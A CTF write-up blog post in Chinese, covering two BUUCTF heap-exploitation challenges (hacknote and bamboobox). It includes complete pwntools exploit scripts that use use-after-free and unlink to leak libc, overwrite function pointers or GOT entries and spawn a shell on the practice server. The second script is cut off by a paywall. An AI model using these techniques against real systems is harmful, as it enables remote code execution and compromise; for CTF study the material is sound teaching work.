2021-09-20 BUUCTF WriteUP(堆/字符串/栈)

最新推荐文章于 2024-05-10 10:36:54 发布
VIP文章 最新推荐文章于 2024-05-10 10:36:54 发布
阅读量572 收藏 1
点赞数
分类专栏: BUUCTF Pwn 文章标签: c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56897090/article/details/120391962
版权

文章目录

堆类

综合模型总结

该类题目目前遇到的题目整体解法:

  1. 几乎都需要制造溢出
    1. 泄露libc地址
    2. 制造任意地址写

溢出的制造方式:

  1. unlink
    1. 套路化制造fake_chunk
  2. UAF
    1. 释放函数有漏洞未清零,可泄露堆内释放后数据
  3. OffByOne
    1. 套路化制造改size位0x08偏移导致新堆堆溢出
  4. 直接溢出(明显的无修改长度检查漏洞)

其他攻击方式:

  1. 当free函数未清零时,制造单链回环结构,导致任意地址写
    1. 前提条件:任意地址写的size位置需要合法
    2. 利用版本
      1. 在低版本可制造Double Free List
      2. 高版本(2.27+)可直接制造Double Free
    3. 利用例子
      1. hook函数地址的任意改写
      2. 程序已知的合法地址任意改写

pwnable_hacknote

分析

堆题,
Pasted image 20210920113336.png

主要的漏洞/利用点:
在创建内容时,将输出函数地址写入了堆内
Pasted image 20210920113426.png

在释放堆时,没有对堆进行清零(变成了野指针)
Pasted image 20210920113509.png

整体特征分析:

  1. free后未清零(存在堆叠利用可能)
  2. 堆内内容存在功能函数地址,通过[[UAF]]去修改可间接任意地址调用

思路猜想:
考虑泄露libc地址改程序函数地址为getshell地址

动态调试笔记:
新技巧,x64可以搜索libc内的sh地址(如果one_gadget无法使用、利用system)
ROPgadget --binary libc-2.23_buuctf* --string "sh"

X86下直接压栈即可;sh;

EXP

整体思路

  1. 泄露libc
  2. 任意写函数地址导致间接getshell
#coding=utf-8
from pwn import *


context.log_level="debug"
context.arch="i386"

isLocal=0
libc=ELF("./x86/libc-2.23_buuctf.so")
filename="/root/hacknote_pwnable"
if  isLocal:#7 - libc6_2.23-0ubuntu11.3_i386
    p=process(filename)#,env={"LD_PRELOAD" : "/lib/x86_64-linux-gnu/ld-2.23.so"}
    pause()
else :
    p=remote("node4.buuoj.cn",27340)

getshell_addr=0x8048945

def create(size,content):
    p.recvuntil('Your choice :')
    p.sendline('1')
    p.recvuntil('Note size :')
    p.sendline(str(size))
    p.recvuntil('Content :')
    p.sendline(content)
def free(idx):
    p.recvuntil('Your choice :')
    p.sendline('2')
    p.recvuntil('Index :')
    p.sendline(str(idx))


def print(idx):
    p.recvuntil('Your choice :')
    p.sendline('3')
    p.recvuntil('Index :')
    p.sendline(str(idx))


elf=ELF(filename)

create(1,b'aaa')
create(23,b'bbb')
#一个堆12字节 构造>=24字节的堆并释放 形成UAF
free(0)
free(1)

print_addr=0x0804862B#puts plt elf.plt["printf"]
print_got=elf.got["printf"]
#重新申请,覆盖了print的函数地址
create(8,p32(print_addr)+p32(print_got))

print(0)#间接调用print(print@got)

leak=u32(p.recv(4))
libc_base=leak-libc.sym["printf"]
log.success("leak=>{}".format(hex(leak))+",libc=>{}".format(hex(libc_base)))#泄露libc


one_gadget=libc_base+libc.sym["system"]#0x5f066
sh_addr=libc_base+0x0000e302#libc内


create(10,b'aaa11')
free(2)


create(8,p32(one_gadget)+b";sh;")#x86直接压栈

print(0)


p.interactive()

hitcontraining_bamboobox

分析

关键利用点:
在修改内容函数下,不检查长度限制(会导致堆溢出)
Pasted image 20210920114139.png

保护情况:

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

特征:

  1. 堆溢出
  2. 无PIE
  3. GOT可写

本题会有一个magic后门函数,但是在BUUCTF平台不适应,故当做无后门题

利用思路:
[[unlink]]

动态调试笔记:
ptr可以往ptr-0x10的方向多试试
unlink后多试试测一测各自修改的偏移是什么,达到任意地址写的偏移,一步步来

EXP

整体思路:

  1. 制造unlink
  2. 泄露libc
  3. 任意地址写
#coding=utf-8
from pwn import *
context.log_level="debug"
context.arch="amd64"
context.terminal = ['tmux','splitw','-h']#cmd : tmux
isLocal=0

filename="/root/bamboobox"
if  isLocal:
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
    p=process(filename)#,env={"LD_PRELOAD" : "/lib/x86_64-linux-gnu/ld-2.23.so"}

else :
    p=remote("node4.buuoj.cn",26645)
    libc=ELF("./x64/libc-2.23_buuctf.so")

elf=ELF(filename)

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
def bk(addr):
    gdb.attach(p,"b *"+str(hex(addr)))
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{
   {print $1}}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr)))
    pause()


def malloc(size,content):
    ru("Your choice:")
    sl('2')
    ru(":")
    sl(str(size))
    ru("name of item:")
    sd(content)

def free(index):
    ru("Your choice:")
    sl('4')
    ru(":")
    sl(str(index))

def edit(index,size,content):
    ru("Your choice:")
    sl('3')
    ru("index of item:")
    sl(str(index))
    ru("length of item name:")
    sl(str(size))
    ru("the new name of the item:")
    sd(content)
def dump():
    ru("Your choice:")
    sl('1')

ptr=0x0000000006020d8## ptr+0x10
fd=ptr-0x18
bk=ptr-0x10

malloc(0x80,b"aaa\n")
malloc(0x30,b"bbb\n")
malloc(0x80,b"ccc\n")
malloc(0x80,b"ddd\n")


#1.制造unlink
fakechunk=p64(0x0)+p64(0x31)#size=0,presize=0x30
fakechunk+=p64(fd)+p64(bk)#fd,bk
fakechunk+=p64(0)+p64(0)#user data
fakechunk+=p64(0x30)+p64(0x90)#next size
edit(1,0x40,fakechunk)

free(2)#向上合并
dump()

free_got=elf.got["free"]
atoi_got=elf.got["atoi"]
magic_addr=0x000000000400D49#0x00000000004008B1#elf.got[""]



payload=p64(0)+p64(atoi_got)
edit(1,0x10,payload)#ptr-0x10



#先测各自偏移 一步步来
#offset:0 ,ptr:0x6020c8
#offset:1 ,ptr:0x6020c0

#2.泄露libc
dump()
leak=(p.recvuntil("\x7f")[-6:]).ljust(8,b"\x00")

print("leak =>"+leak)

libc_base=u64(leak)-libc.sym["atoi"]
system_addr=libc_base
最低0.47元/天 解锁文章
Ch1lkat
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
ISCTF2021-WriteUp.pdf
10-24
isctf的详细wp
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1
BUUCTF笔记之Web系列部分WriteUp(二)
克格莫
05-17 1959
1、[极客大挑战 2019]Http 不敢置信12世纪了还有这种简单题,我还在拼命扫目录和备份。。。。 在secret.php重发http请求头 Referer: https://www.Sycsecret.com 修改User-Agent为Syclover: 这里伪造来源IP 添加一个字段X-Forwarded-For: 127.0.0.1 拿到flag. ...
BUUCTF平台web writeup
a370793934的专栏
11-28 1442
[HCTF 2018]WarmUp 首先f12查看源码,发现一个hint: 于是访问source.php,得到审计的源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) /* ...
CTF writeup
08-10
CTF writeup masterCTF write ups from the vulnhub CTF team
BUUCTF-WriteUp
鱼的博客
02-01 670
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
BUUCTF】Web题目 WriteUp
Luminous_song的博客
03-12 5764
Web类题目
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3158
前言 开始刷一刷Buuctf的PWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的溢出,后门函数fun()在0x401186,本
BUUCTF-Writeup
m0_46263419的博客
09-26 489
BUUCTF-Writeup 1.Web-[极客大挑战 2019]Secret File 把一切都放在那里了,看到奇怪的背景颜色想到可能会在背景隐藏东西试一下Ctrl+A,果然 点击后跳转界面 我们可以找到但当我们访问action,php时,会直接跳转到end.php,抓包后可得到 访问可得 利用文件包含漏洞(PHP伪协议) ?file=php://filter/read=convert.base64-encode/resource=flag.php 解码后即可得到flag 2.[ACTF2020 新
UMCTF2021-Writeup:MOCSCTF主持的UMCTF2021的文章
03-14
UMCTF2021-编写 MOCSCTF主持的UMCTF2021的文章 欢迎加入我们: 欢迎加入我们的行列: CTF时间: ://ctftime.org/team/120747 面子书: : 感谢以下提供协助: 感谢您提供的支持: 特鲁@MOCTF 梁锦@@ MOCTF 邦@MOCTF...
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
BUUCTF-[ACTF2020 新生赛]Include 1 write up
m0_62851980的博客
04-05 1626
先打开靶机, ctrl+u查看一下页面源代码: “?file=flag.php”表示这里应该有文件包含漏洞 ,页面调用了include语句,那么我们使用php伪协议中的php://filter php://filter可以获取指定文件源码。当它与include函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致任意文件读取。 php://filter可以使用不同的参数来达到不同的作用: resource(要过滤的数据流):必写.
BUUCTF 加固题 Ezsql WriteUp
柠檬i的博客
01-15 7558
本题的web界面是登录界面,界面含有sql注入漏洞,题目要求进入目标服务器修复漏洞,然后进行Check,Check True即可返回flag值
CTFWeb-BUUCTF竞赛真题WriteUp(1)
道阻且长,行则将至。
08-20 7592
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真题环境: 此处记录下部分 Web 题目练习过程。 N0.1 强网杯-高明的黑客 1、创建并访问靶机: 2、根据题目提示,访问并下载 www.tar.gz: 打开压缩包,发现有3000多个php文件,尝试搜索flag文件,未果。于是打开php文件进行代码审计,发现代码中存在大量使用 system()/eval()/assert() 等函数执行 get 或 post 传递的参数,这意味我们也许可以通过传递参数的方式来执行任意命令。
CTF杂项-BUUCTF竞赛真题WriteUp(2)
道阻且长,行则将至。
05-05 6716
文章目录前言No.1 Git动图分解提取信息No.2 隐藏文件提取与爆破N0.3 Base64编码还原图片No.4 winhex修改图片大小No.5 编辑器查看图片隐写 前言 为了划水过几天的“ 红帽杯 ” 网络安全大赛,学习并记录下 BUUCTF 平台的杂项部分题目,因为去年参加“ 强网杯 ”网络安全大赛发现杂项类型的题目还是可以争取得分的,也希望过几天运气好点吧… No.1 Git动图分解提取信息 下载附件发现是一个金三胖的动图,闪烁着红色 flag 字体(因三胖的图片被平台列为违规项目所以无法展示)。
BUUCTF WEB writeup(持续更新)
zjnu_y3s的博客
09-24 753
BUUCTF WEB(持续更新) 1、Warmup 打开题目链接,得到一张图片,如下图: 此时先想到看这个网页的源代码,输入source.php即可得到源代码,如下图: 进入php代码审计,粗略看一下可以发现有file,所以我们要想办法得到file,首先先看与file有关的代码块: 看到中间发现需要前面创建的函数,所以我们返回去进行前面代码的审计,在白名单处能看到有两个文件,一个source.php、一个hint.php,我们先打开hint.php,可以看到如下字符: 暂时不知道是干什么用的,
Linux学习C语言版 LED 灯实验
最新发布
qq_44219883的博客
05-10 340
大部分情况下都是使用 C 语言去编写的。只是在开始部分用汇编来初始化一下 C 语言环境,比如初始化 DDR、设置堆指针 SP 等等,当这些工作都做完以后就可以进入 C 语言环境,也就是运行 C 语言代码,一般都是进入 main 函数。所以我们有两部分文件要做:①、汇编文件汇编文件只是用来完成 C 语言环境搭建。②、C 语言文件C 语言文件就是完成我们的业务层代码的,其实就是我们实际例程要完成的功能。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值